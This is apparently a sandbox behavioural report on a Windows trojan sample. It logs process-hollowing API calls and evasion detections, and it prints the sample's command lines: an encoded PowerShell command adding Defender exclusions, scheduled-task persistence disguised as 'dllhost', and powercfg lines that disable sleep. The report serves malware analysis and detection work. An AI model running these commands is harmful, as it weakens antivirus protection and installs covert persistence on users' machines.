NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c51000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73be1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70836000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6c381000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6bd01000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6bcf1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6bbd1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6bb81000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6bb71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6bb51000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6bac1000 process_handle: 0xffffffff	1

Creates hidden or system file (2 events)

Time & API	Arguments	Status	Return	Repeated
SetFileAttributesW July 8, 2023, 1:59 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\Dllhost\ filepath: C:\ProgramData\Dllhost\	1	1	0
SetFileAttributesW July 8, 2023, 1:59 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\HostData\ filepath: C:\ProgramData\HostData\	1	1	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (6 events)

cmdline	powershell -EncodedCommand "PAAjAEwATQBVAGkAYgB0AGMAaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEQANgBtAG0AMABFAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBqAGoAVQBNAFYATwAyAEsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwBLAHAATABVAGYAUgB1ACMAPgA="
cmdline	SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1084" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /C powershell -EncodedCommand "PAAjAEwATQBVAGkAYgB0AGMAaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEQANgBtAG0AMABFAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBqAGoAVQBNAFYATwAyAEsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwBLAHAATABVAGYAUgB1ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1084" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Executes one or more WMI queries (3 events)

wmi	SELECT * FROM Win32_OperatingSystem
wmi	SELECT * FROM Win32_Processor
wmi	SELECT TotalPhysicalMemory FROM Win32_ComputerSystem

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 8, 2023, 1:59 p.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 8, 2023, 1:59 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW July 8, 2023, 1:59 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Potentially malicious URLs were found in the process memory dump (1 event)

url	https://gcc.gnu.org/bugs/):

Yara rule detected in process memory (18 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	task schedule	rule	schtasks_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Following Rule is referenced from AlienVault's Yara rule repository.This rule contains additional processes and driver names.	rule	vmdetect_misc

Terminates another process (9 events)

Time & API	Arguments	Status	Return
NtTerminateProcess July 8, 2023, 1:59 p.m.	status_code: 0xffffffff process_identifier: 54168 process_handle: 0x000007d0		0
NtTerminateProcess July 8, 2023, 1:59 p.m.	status_code: 0xffffffff process_identifier: 54168 process_handle: 0x000007d0	1	0
NtTerminateProcess July 8, 2023, 1:59 p.m.	status_code: 0xffffffff process_identifier: 53460 process_handle: 0x000007f8		0
NtTerminateProcess July 8, 2023, 1:59 p.m.	status_code: 0xffffffff process_identifier: 53460 process_handle: 0x000007f8	1	0
NtTerminateProcess July 8, 2023, 1:59 p.m.	status_code: 0xffffffff process_identifier: 53980 process_handle: 0x000007f8		0
NtTerminateProcess July 8, 2023, 1:59 p.m.	status_code: 0xffffffff process_identifier: 53980 process_handle: 0x000007f8		3221225738
NtTerminateProcess July 8, 2023, 1:59 p.m.	status_code: 0xffffffff process_identifier: 53416 process_handle: 0x000007f8		0
NtTerminateProcess July 8, 2023, 1:59 p.m.	status_code: 0xffffffff process_identifier: 53416 process_handle: 0x000007f8		3221225738
NtTerminateProcess July 8, 2023, 2 p.m.	status_code: 0xffffffff process_identifier: 53812 process_handle: 0x00000324		0

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1084" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1084" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Executes one or more WMI queries which can be used to identify virtual machines (2 events)

wmi	SELECT * FROM Win32_Processor
wmi	SELECT TotalPhysicalMemory FROM Win32_ComputerSystem

One or more of the buffers contains an embedded PE file (2 events)

buffer	Buffer with sha1: 6e6810493e9bd1a1ebcc555102a4c81ce5f2c6cd
buffer	Buffer with sha1: 1971a29db79684b2368d0392aeb5ee278dff48c6

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory July 8, 2023, 1:58 p.m.	process_identifier: 2076 region_size: 1490944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000074	1	0
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 49152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000c85c		3221225496
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 49152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000c85c	1	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation July 8, 2023, 1:59 p.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (1 event)

description

AppLaunch.exe tried to sleep 2728196 seconds, actually delayed analysis time by 2728196 seconds

Installs itself for autorun at Windows startup (4 events)

cmdline	SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1084" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1084" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 8, 2023, 1:58 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2076 process_handle: 0x00000074	1	1	0
WriteProcessMemory July 8, 2023, 1:59 p.m.	buffer: base_address: 0xfffde008 process_identifier: 53812 process_handle: 0x0000c85c	1	1	0

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 652 called NtSetContextThread to modify thread in remote process 2076
Process injection	Process 2076 called NtSetContextThread to modify thread in remote process 53812
NtSetContextThread July 8, 2023, 1:58 p.m.	registers.eip: 2005598660 registers.esp: 3407340 registers.edi: 0 registers.eax: 4199584 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000070 process_identifier: 2076	1	0	0
NtSetContextThread July 8, 2023, 1:59 p.m.	registers.eip: 2005598660 registers.esp: 4454760 registers.edi: 0 registers.eax: 812798 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000c858 process_identifier: 53812	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 652 resumed a thread in remote process 2076
Process injection	Process 2076 resumed a thread in remote process 53812
NtResumeThread July 8, 2023, 1:58 p.m.	thread_handle: 0x00000070 suspend_count: 1 process_identifier: 2076	1	0	0
NtResumeThread July 8, 2023, 1:59 p.m.	thread_handle: 0x0000c858 suspend_count: 1 process_identifier: 53812	1	0	0

Executed a process and injected code into it, probably while unpacking (42 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW July 8, 2023, 1:58 p.m.	thread_identifier: 2080 thread_handle: 0x00000070 process_identifier: 2076 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000074	1	1
NtGetContextThread July 8, 2023, 1:58 p.m.	thread_handle: 0x00000070	1	0
NtAllocateVirtualMemory July 8, 2023, 1:58 p.m.	process_identifier: 2076 region_size: 1490944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000074	1	0
WriteProcessMemory July 8, 2023, 1:58 p.m.	buffer: base_address: 0x00400000 process_identifier: 2076 process_handle: 0x00000074	1	1
WriteProcessMemory July 8, 2023, 1:58 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2076 process_handle: 0x00000074	1	1
NtSetContextThread July 8, 2023, 1:58 p.m.	registers.eip: 2005598660 registers.esp: 3407340 registers.edi: 0 registers.eax: 4199584 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000070 process_identifier: 2076	1	0
NtResumeThread July 8, 2023, 1:58 p.m.	thread_handle: 0x00000070 suspend_count: 1 process_identifier: 2076	1	0
CreateProcessInternalW July 8, 2023, 1:59 p.m.	thread_identifier: 53816 thread_handle: 0x0000c858 process_identifier: 53812 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000c85c	1	1
NtGetContextThread July 8, 2023, 1:59 p.m.	thread_handle: 0x0000c858	1	0
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 49152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000c85c		3221225496
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 49152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000c85c	1	0
WriteProcessMemory July 8, 2023, 1:59 p.m.	buffer: base_address: 0x000c0000 process_identifier: 53812 process_handle: 0x0000c85c	1	1
WriteProcessMemory July 8, 2023, 1:59 p.m.	buffer: base_address: 0xfffde008 process_identifier: 53812 process_handle: 0x0000c85c	1	1
NtSetContextThread July 8, 2023, 1:59 p.m.	registers.eip: 2005598660 registers.esp: 4454760 registers.edi: 0 registers.eax: 812798 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000c858 process_identifier: 53812	1	0
NtResumeThread July 8, 2023, 1:59 p.m.	thread_handle: 0x0000c858 suspend_count: 1 process_identifier: 53812	1	0
NtResumeThread July 8, 2023, 1:59 p.m.	thread_handle: 0x00000144 suspend_count: 1 process_identifier: 53812	1	0
NtResumeThread July 8, 2023, 1:59 p.m.	thread_handle: 0x000001bc suspend_count: 1 process_identifier: 53812	1	0
NtResumeThread July 8, 2023, 1:59 p.m.	thread_handle: 0x000001fc suspend_count: 1 process_identifier: 53812	1	0
NtResumeThread July 8, 2023, 1:59 p.m.	thread_handle: 0x00000278 suspend_count: 1 process_identifier: 53812	1	0
NtResumeThread July 8, 2023, 1:59 p.m.	thread_handle: 0x000002dc suspend_count: 1 process_identifier: 53812	1	0
NtResumeThread July 8, 2023, 1:59 p.m.	thread_handle: 0x00000348 suspend_count: 1 process_identifier: 53812	1	0
NtResumeThread July 8, 2023, 1:59 p.m.	thread_handle: 0x0000036c suspend_count: 1 process_identifier: 53812	1	0
CreateProcessInternalW July 8, 2023, 1:59 p.m.	thread_identifier: 53984 thread_handle: 0x00000370 process_identifier: 53980 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /C powershell -EncodedCommand "PAAjAEwATQBVAGkAYgB0AGMAaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEQANgBtAG0AMABFAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBqAGoAVQBNAFYATwAyAEsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwBLAHAATABVAGYAUgB1ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off filepath_r: stack_pivoted: 0 creation_flags: 134742016 (CREATE_NO_WINDOW\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000037c	1	1
NtResumeThread July 8, 2023, 1:59 p.m.	thread_handle: 0x000004ac suspend_count: 1 process_identifier: 53812	1	0
NtResumeThread July 8, 2023, 1:59 p.m.	thread_handle: 0x00000770 suspend_count: 1 process_identifier: 53812	1	0
NtResumeThread July 8, 2023, 1:59 p.m.	thread_handle: 0x000007b4 suspend_count: 1 process_identifier: 53812	1	0
NtResumeThread July 8, 2023, 1:59 p.m.	thread_handle: 0x000007c8 suspend_count: 1 process_identifier: 53812	1	0
CreateProcessInternalW July 8, 2023, 1:59 p.m.	thread_identifier: 53420 thread_handle: 0x000007cc process_identifier: 53416 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134742016 (CREATE_NO_WINDOW\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000007d0	1	1
CreateProcessInternalW July 8, 2023, 1:59 p.m.	thread_identifier: 53464 thread_handle: 0x000007d0 process_identifier: 53460 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1084" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134742016 (CREATE_NO_WINDOW\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000007cc	1	1
NtResumeThread July 8, 2023, 1:59 p.m.	thread_handle: 0x0000080c suspend_count: 1 process_identifier: 53812	1	0
CreateProcessInternalW July 8, 2023, 1:59 p.m.	thread_identifier: 54040 thread_handle: 0x000000f4 process_identifier: 54036 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -EncodedCommand "PAAjAEwATQBVAGkAYgB0AGMAaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEQANgBtAG0AMABFAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBqAGoAVQBNAFYATwAyAEsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwBLAHAATABVAGYAUgB1ACMAPgA=" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1
CreateProcessInternalW July 8, 2023, 1:59 p.m.	thread_identifier: 54128 thread_handle: 0x000000f8 process_identifier: 54124 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\powercfg.exe track: 1 command_line: powercfg /x -hibernate-timeout-ac 0 filepath_r: C:\Windows\system32\powercfg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f4	1	1
CreateProcessInternalW July 8, 2023, 1:59 p.m.	thread_identifier: 54216 thread_handle: 0x000000f4 process_identifier: 54212 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\powercfg.exe track: 1 command_line: powercfg /x -hibernate-timeout-dc 0 filepath_r: C:\Windows\system32\powercfg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1
CreateProcessInternalW July 8, 2023, 1:59 p.m.	thread_identifier: 53268 thread_handle: 0x000000f8 process_identifier: 53264 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\powercfg.exe track: 1 command_line: powercfg /x -standby-timeout-ac 0 filepath_r: C:\Windows\system32\powercfg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f4	1	1
CreateProcessInternalW July 8, 2023, 1:59 p.m.	thread_identifier: 53312 thread_handle: 0x000000f4 process_identifier: 53308 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\powercfg.exe track: 1 command_line: powercfg /x -standby-timeout-dc 0 filepath_r: C:\Windows\system32\powercfg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1
CreateProcessInternalW July 8, 2023, 1:59 p.m.	thread_identifier: 53364 thread_handle: 0x000000f8 process_identifier: 53360 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\powercfg.exe track: 1 command_line: powercfg /hibernate off filepath_r: C:\Windows\system32\powercfg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f4	1	1
NtResumeThread July 8, 2023, 1:59 p.m.	thread_handle: 0x000002c8 suspend_count: 1 process_identifier: 54036	1	0
NtResumeThread July 8, 2023, 1:59 p.m.	thread_handle: 0x0000031c suspend_count: 1 process_identifier: 54036	1	0
NtResumeThread July 8, 2023, 1:59 p.m.	thread_handle: 0x00000468 suspend_count: 1 process_identifier: 54036	1	0
NtResumeThread July 8, 2023, 1:59 p.m.	thread_handle: 0x000004c8 suspend_count: 1 process_identifier: 54036	1	0
CreateProcessInternalW July 8, 2023, 1:59 p.m.	thread_identifier: 53540 thread_handle: 0x000000f4 process_identifier: 53536 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1
CreateProcessInternalW July 8, 2023, 1:59 p.m.	thread_identifier: 53560 thread_handle: 0x000000f4 process_identifier: 53556 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1084" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000f8	1	1

File has been identified by 37 AntiVirus engines on VirusTotal as malicious (37 events)

Bkav	W32.AIDetectMalware
MicroWorld-eScan	Gen:Trojan.Heur2.HRY@IjvCzRi
FireEye	Generic.mg.2796bf32abbebdd1
ALYac	Gen:Trojan.Heur2.HRY@IjvCzRi
Alibaba	Trojan:Win32/GenKryptik.5ffc7900
Cybereason	malicious.2abbeb
Arcabit	Trojan.Heur2.EB8404
BitDefenderTheta	AI:Packer.70F862A21C
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (moderate confidence)
ESET-NOD32	a variant of Win32/GenKryptik.GLKG
APEX	Malicious
